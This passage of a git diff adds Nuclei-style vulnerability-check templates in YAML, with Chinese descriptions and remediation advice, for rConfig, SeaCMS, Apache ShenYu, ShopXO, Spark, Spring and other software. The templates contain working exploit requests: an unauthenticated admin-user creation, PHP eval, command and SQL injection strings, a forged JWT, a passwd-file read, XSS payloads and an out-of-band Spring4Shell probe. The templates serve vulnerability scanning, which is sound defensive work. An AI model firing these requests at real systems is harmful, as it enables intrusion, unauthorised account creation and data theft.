1.目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + https://www.rconfig.com/ +requests: +- matchers: + - type: word + part: body + words: + - User {{randstr}} successfully added to Database + - type: status + status: + - 302 + matchers-condition: and + raw: + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb + Cookie: PHPSESSID={{randstr}} + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="username" + + {{randstr}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="passconf" + + Testing1@ + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="password" + + Testing1@ + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="email" + + test@{{randstr}}.tld + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="editid" + + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="add" + + add + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="ulevelid" + + 9 + --01b28e152ee044338224bf647275f8eb-- diff --git a/config/51pwn/yaml/rConfig/CVE-2020-9425.yaml b/config/51pwn/yaml/rConfig/CVE-2020-9425.yaml new file mode 100755 index 000000000..cea156ee7 --- /dev/null +++ b/config/51pwn/yaml/rConfig/CVE-2020-9425.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-9425 +info: + name: rConfig Unauthenticated Sensitive Information Disclosure + author: + - l0ne1y + tags: + - cve + - cve2020 + - rconfig + description: |- + rConfig before 3.9.4 明文凭证泄漏漏洞 + rConfig是一款开源的网络配置管理实用程序。 + + rConfig 3.9.4之前版本中的includes/head.inc.php文件存在安全漏洞。攻击者可通过向settings.php文件发送GET请求利用该漏洞检索存储的明文形式的凭证。 + reference: + - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 + - /~https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 + severity: high + classification: + cve-id: + - cve-2020-9425 + cwe-id: + - cwe-670 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + remediation: |- + 官方修复方案: + 1.目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + /~https://github.com/rconfig/rconfig +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - defaultNodeUsername + - defaultNodePassword + matchers-condition: and + path: + - '{{BaseURL}}/settings.php' + method: GET diff --git a/config/51pwn/yaml/satellian/CVE-2020-7980.yaml b/config/51pwn/yaml/satellian/CVE-2020-7980.yaml new file mode 100755 index 000000000..82c0f2cfd --- /dev/null +++ b/config/51pwn/yaml/satellian/CVE-2020-7980.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-7980 +info: + name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution + author: + - l0ne1y + description: |- + Intellian Aptus Web 操作系统命令执行漏洞 + Intellian Aptus Web 1.24版本中存在操作系统命令注入漏洞。远程攻击者可借助JSON数据中的Q字段利用该漏洞执行任意操作系统命令 + severity: critical + remediation: |2- + + 官方修复建议:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.intelliantech.com + + 临时修复建议: + 1、尽量不去执行外部的应用程序或命令。
2、使用自定义函数或函数库实现外部应用程序或命令的功能。
3、在执行system、eval等命令执行功能的函数前,校验参数内容。
4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: word + words: + - '{{randstr}}' + - type: regex + negative: true + regex: + - echo.*?{{randstr}} + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /cgi-bin/libagent.cgi?type=J HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Cookie: ctr_t=0; sid=123456789 + + {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "echo {{randstr}}", "F": "EXEC_CMD"}, "V_": 1} + max-redirects: 2 + redirects: true diff --git a/config/51pwn/yaml/seacms/seacms-before-v992-rce.yaml b/config/51pwn/yaml/seacms/seacms-before-v992-rce.yaml new file mode 100755 index 000000000..cde10cce8 --- /dev/null +++ b/config/51pwn/yaml/seacms/seacms-before-v992-rce.yaml @@ -0,0 +1,26 @@ +id: seacms-before-v992-rce +info: + name: SeaCMS version1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.seacms.net/ + + 临时修复方案:
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: dsl + dsl: + - status_code_1==200 && status_code_2==200 && contains(body_2,randstr) + matchers-condition: and + path: + - '{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E' + - '{{BaseURL}}/data/mysqli_error_trace.php?_=printf({{randstr}})%3B' + method: GET + req-condition: true diff --git a/config/51pwn/yaml/seacms/seacms-rce.yaml b/config/51pwn/yaml/seacms/seacms-rce.yaml new file mode 100755 index 000000000..29436a73c --- /dev/null +++ b/config/51pwn/yaml/seacms/seacms-rce.yaml @@ -0,0 +1,34 @@ +id: seacms-rce +info: + name: SeaCMS V6.4.5 RCE + author: + - l0ne1y + description: |- + SeaCMS <= 6.45 search.php order 远程代码执行漏洞 + SeaCMS(又名海洋 cms)是基于PHP+MySql 技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统。 + SeaCMS <= 6.45 search.php 存在远程代码执行漏洞,攻击者可利用该漏洞执行任意命令。 + severity: high + remediation: |- + 官方修复建议: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.seacms.net/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - phpinfo + - PHP Version + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/search.php?searchtype=5' + method: POST + body: searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if} diff --git a/config/51pwn/yaml/seacms/seacms-sqli.yaml b/config/51pwn/yaml/seacms/seacms-sqli.yaml new file mode 100755 index 000000000..60cbc8ab1 --- /dev/null +++ b/config/51pwn/yaml/seacms/seacms-sqli.yaml @@ -0,0 +1,30 @@ +id: seacms-sqli +info: + name: SeaCMS V8.7 SQL Injection + author: + - l0ne1y + description: |- + SeaCMS <= 8.7 api/index.php rlist SQL注入漏洞 + SeaCMS(又名海洋 cms)是基于PHP+MySql 技术开发的开源 CMS,是一套专为不同需求的站长而设计的视频点播系统。 + SeaCMS <= 8.7 api/index.php 存在 SQL 注入漏洞,攻击者可利用该漏洞执行恶意 SQL 命令。 + severity: high + remediation: |- + 官方修复建议:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.seacms.net/ + + 临时修复建议:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + part: body + words: + - 6f7c6dcbc380aac3bcba1f9fccec991e + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`' + method: GET + max-redirects: 2 + redirects: true diff --git a/config/51pwn/yaml/seacms/seacms-v654-rce.yaml b/config/51pwn/yaml/seacms/seacms-v654-rce.yaml new file mode 100755 index 000000000..be051793a --- /dev/null +++ b/config/51pwn/yaml/seacms/seacms-v654-rce.yaml @@ -0,0 +1,32 @@ +id: seacms-v654-rce +info: + name: seacms-v654-rce + author: + - l0ne1y + description: |- + SeaCMS = 6.54 search.php 命令执行漏洞 + SeaCMS(又名海洋 cms)是基于PHP+MySql 技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统。 + SeaCMS = 6.54 search.php 存在命令执行漏洞,攻击者可利用该漏洞执行任意命令。 + severity: high + remediation: |- + 官方修复建议:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + https://www.seacms.net/ + + 临时修复建议:
1、尽量不去执行外部的应用程序或命令。
2、使用自定义函数或函数库实现外部应用程序或命令的功能。
3、在执行system、eval等命令执行功能的函数前,校验参数内容。
4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: word + words: + - '{{randstr}}' + - type: regex + negative: true + regex: + - prin.*?tf.{{randstr}} + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/search.php' + method: POST + body: searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=prin&9[]=tf({{randstr}}); diff --git a/config/51pwn/yaml/seacms/seacmsv645-command-exec.yaml b/config/51pwn/yaml/seacms/seacmsv645-command-exec.yaml new file mode 100755 index 000000000..000a67c31 --- /dev/null +++ b/config/51pwn/yaml/seacms/seacmsv645-command-exec.yaml @@ -0,0 +1,30 @@ +id: seacmsv645-command-exec +info: + name: seacmsv645-command-exec + author: + - l0ne1y + description: |- + SeaCMS <= 6.54 search.php 远程代码执行漏洞 + SeaCMS(又名海洋 cms)是基于PHP+MySql 技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统。 + SeaCMS <= 6.54 search.php 存在远程代码执行漏洞,攻击者可利用该漏洞执行任意命令。 + severity: high + remediation: |- + 官方修复建议: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.seacms.net/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,verify) && status_code==200 + path: + - '{{BaseURL}}/search.php?searchtype=5' + method: POST + body: searchtype=5&order=}{end if} {if:1)print({{verify}});if(1}{end if} + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(8,"")}}' diff --git a/config/51pwn/yaml/shadow/CVE-2020-20982.yaml b/config/51pwn/yaml/shadow/CVE-2020-20982.yaml new file mode 100755 index 000000000..06f24160f --- /dev/null +++ b/config/51pwn/yaml/shadow/CVE-2020-20982.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-20982 +info: + name: shadoweb wdja v1.5.1 - Cross-Site Scripting + author: + - pikpikcu + description: |- + shadow 跨站脚本漏洞 + shadow是一套用于维护Debian系统的工具套件。 + + shadow web wdja 中存在跨站脚本漏洞,该漏洞源于产品的/php/passport/index.php文件未能正确处理backurl参数中的数据。攻击者可通过该漏洞执行客户端代码。以下产品及版本受到影响:shadoweb wdja v1.5.1 版本。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页: + /~https://github.com/shadoweb/wdja + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + words: + - + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/shenyu/CVE-2021-37580.yaml b/config/51pwn/yaml/shenyu/CVE-2021-37580.yaml new file mode 100755 index 000000000..495321bda --- /dev/null +++ b/config/51pwn/yaml/shenyu/CVE-2021-37580.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-37580 +info: + name: Apache ShenYu Admin JWT - Authentication Bypass + author: + - l0ne1y + description: |- + Apache ShenYu Admin JWT认证绕过漏洞 + Apache ShenYu 是应用于所有微服务场景的,可扩展、高性能、响应式的 API 网关解决方案。 + Apache ShenYu Admin 2.3.0 及 2.4.0 版本中存在身份验证绕过漏洞,攻击者可通过该漏洞绕过JSON Web Token (JWT)安全认证,直接进入系统后台。 + + 影响版本: + 2.3.0 <= Apache ShenYu <= 2.4.0 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb +requests: +- matchers: + - type: word + condition: and + words: + - query success + - '"userName":"admin"' + - '"code":200' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /dashboardUser HTTP/1.1 + Host: {{Hostname}} + X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk diff --git a/config/51pwn/yaml/shenyu/CVE-2022-23944.yaml b/config/51pwn/yaml/shenyu/CVE-2022-23944.yaml new file mode 100755 index 000000000..e84b1d5e5 --- /dev/null +++ b/config/51pwn/yaml/shenyu/CVE-2022-23944.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-23944 +info: + name: Apache ShenYu Admin Unauth Access + author: + - l0ne1y + description: |- + Apache ShenYu Admin plugin 未授权访问漏洞 + Apache ShenYu是美国阿帕奇(Apache)基金会的一个异步的,高性能的,跨语言的,响应式的 API 网关。 + + Apache ShenYu 2.4.0 和 2.4.1存在访问控制错误漏洞,该漏洞源于用户无需身份验证即可访问 /plugin api。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y + + **临时修复方案** + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"message":"query success"' + - '"code":200' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/plugin' + method: GET diff --git a/config/51pwn/yaml/shopxo/CNVD-2021-15822.yaml b/config/51pwn/yaml/shopxo/CNVD-2021-15822.yaml new file mode 100755 index 000000000..0a3c32e18 --- /dev/null +++ b/config/51pwn/yaml/shopxo/CNVD-2021-15822.yaml @@ -0,0 +1,32 @@ +id: CNVD-2021-15822 +info: + name: ShopXO Download File Read + author: + - l0ne1y + description: |- + ShopXO存在任意文件读取漏洞 + ShopXO是一套开源的企业级开源电子商务系统。 + + ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: + https://www.shopxo.net/ + + 临时修复建议: +
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/spark/spark-webui-unauth.yaml b/config/51pwn/yaml/spark/spark-webui-unauth.yaml new file mode 100755 index 000000000..230b1e4c8 --- /dev/null +++ b/config/51pwn/yaml/spark/spark-webui-unauth.yaml @@ -0,0 +1,36 @@ +id: spark-webui-unauth +info: + name: Unauthenticated Spark WebUI + author: + - l0ne1y + description: |- + Apache Spark 未授权访问漏洞 + Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们进行未授权访问。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://spark.apache.org/docs/latest/configuration.html#security + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - Spark Master at spark:// + - <strong>URL:</strong> + matchers-condition: and + path: + - '{{BaseURL}}' + method: GET diff --git a/config/51pwn/yaml/spark/unauth-spark-api.yaml b/config/51pwn/yaml/spark/unauth-spark-api.yaml new file mode 100755 index 000000000..202631e5c --- /dev/null +++ b/config/51pwn/yaml/spark/unauth-spark-api.yaml @@ -0,0 +1,36 @@ +id: unauth-spark-api +info: + name: Unauthenticated Spark REST API + author: + - l0ne1y + description: |- + Apache Spark REST API未授权访问漏洞 + Spark产品的REST API接口允许未经认证的用户访问 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://spark.apache.org/docs/latest/configuration.html#security + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制 +requests: +- matchers: + - type: status + status: + - 400 + - type: word + condition: and + part: body + words: + - Missing an action + - serverSparkVersion + matchers-condition: and + path: + - '{{BaseURL}}/v1/submissions' + method: GET diff --git "a/config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2016-4977.yaml" "b/config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2016-4977.yaml" new file mode 100755 index 000000000..0272b705b --- /dev/null +++ "b/config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2016-4977.yaml" @@ -0,0 +1,25 @@ +id: CVE-2016-4977 +info: + name: Spring Security OAuth2 Remote Command Execution + author: + - l0ne1y + description: |- + Spring Security OAuth2远程代码执行漏洞 + Spring Security OAuth2全套的解决方案来支持在Spring Cloud/Spring Boot环境下使用OAuth2.0,提供了开箱即用的组件。在Spring Security OAuth 2.0.0至2.0.9和1.0.0至1.0.5中使用白标视图处理授权请求时,response_type参数值作为Spring SpEL执行,使恶意用户能够通过制作response_type的值来触发远程代码执行。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + part: body + words: + - 'Unsupported response types: [978015547]' + - type: status + status: + - 400 + matchers-condition: and + path: + - '{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test' + method: GET diff --git "a/config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2022-22965.yaml" "b/config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2022-22965.yaml" new file mode 100755 index 000000000..6ed90ebc8 --- /dev/null +++ "b/config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2022-22965.yaml" @@ -0,0 +1,43 @@ +id: CVE-2022-22965 +info: + name: Spring Framework - Remote Code Execution + author: + - l0ne1y + description: |- + Spring远程代码执行漏洞 + Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。 + severity: critical + remediation: |- + #### 官方修复方案 + 当前 Spring Framework 官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下: + [/~https://github.com/spring-projects/spring-framework/tags](/~https://github.com/spring-projects/spring-framework/tags) + 注:Spring Framework 5.3.18和Spring Framework 5.2.20是 Spring 官方提供的两个安全版本(截止至3月31日) + + #### 临时解决方案 + 在应用中全局搜索`@InitBinder`注解,看看方法体内是否调用`dataBinder.setDisallowedFields`方法,如果发现此代码片段的引入,则在原来的黑名单中,添加`{"class.","Class.",".class.",".Class."}`。(注:如果此代码片段使用较多,需要每个地方都追加) + 在应用系统的项目包下新建以下全局类,并保证这个类被Spring 加载到(推荐在Controller所在的包中添加)。完成类添加后,需对项目进行重新编译打包和功能验证测试,并重新发布项目 + + #### WAF等安全组件防护 + 在WAF等网络防护设备上,根据实际部署业务的流量情况,实现对`"class.","Class.",".class.",".Class."`等字符串的规则过滤,并在部署过滤规则后,对业务运行情况进行测试,避免产生额外影响。 +requests: +- path: + - '{{BaseURL}}/?class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx' + method: GET +- matchers: + - type: word + part: interactsh_protocol + words: + - http + - type: word + part: interactsh_request + words: + - 'User-Agent: Java' + case-insensitive: true + matchers-condition: and + path: + - '{{BaseURL}}' + method: POST + body: | + class.module.classLoader.resources.context.configFile=https://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx + headers: + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/storm/apache-storm-unauth.yaml b/config/51pwn/yaml/storm/apache-storm-unauth.yaml new file mode 100755 index 000000000..c04a723a3 --- /dev/null +++ b/config/51pwn/yaml/storm/apache-storm-unauth.yaml @@ -0,0 +1,35 @@ +id: apache-storm-unauth +info: + name: Apache Storm Unauth + author: + - l0ne1y + description: |- + Apache Storm存在未授权访问漏洞 + Apache Storm是一个分布式实时大数据处理系统。 + Apache Storm存在未授权访问漏洞,攻击者可利用该漏洞未授权访问,从而获取敏感信息及进行未授权操作等。 + severity: medium + remediation: |- + **官方修复方案** + 厂商尚未提供修复方案,请关注厂商主页及时更新: + https://spark.apache.org/downloads.html + + **临时修复方案** + 1、后台管理系统禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、后台管理系统所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 + 4、采用成熟的权限管理框架,如spring security。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"totalMem":' + - '"stormVersion":' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/api/v1/cluster/summary' + method: GET diff --git a/config/51pwn/yaml/twitter/CVE-2020-35774.yaml b/config/51pwn/yaml/twitter/CVE-2020-35774.yaml new file mode 100755 index 000000000..3021650a6 --- /dev/null +++ b/config/51pwn/yaml/twitter/CVE-2020-35774.yaml @@ -0,0 +1,51 @@ +id: CVE-2020-35774 +info: + name: twitter-server Cross-Site Scripting + author: + - pikpikcu + tags: + - cve + - cve2020 + - xss + - twitter-server + description: |- + Twitter TwitterServer 跨站脚本漏洞 + Twitter TwitterServer是美国Twitter公司的一个基于Scala语言的用于构建Twitter服务器的软件。该软件可通过模板来构建Twitter服务器,另外可对服务器进行管理、监控。 + + Twitter TwitterServer 20.12.0之前版本存在跨站脚本漏洞,该漏洞源于在一些配置中,允许通过直方图端点进行XSS。 + reference: + - https://advisory.checkmarx.net/advisory/cx-2020-4287 + - https://nvd.nist.gov/vuln/detail/cve-2020-35774 + - /~https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c + - /~https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0 + severity: medium + classification: + cve-id: + - cve-2020-35774 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - </script><script>alert(document.domain)</script> + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true' + method: GET diff --git a/config/51pwn/yaml/uWSGI/CVE-2018-7490.yaml b/config/51pwn/yaml/uWSGI/CVE-2018-7490.yaml new file mode 100755 index 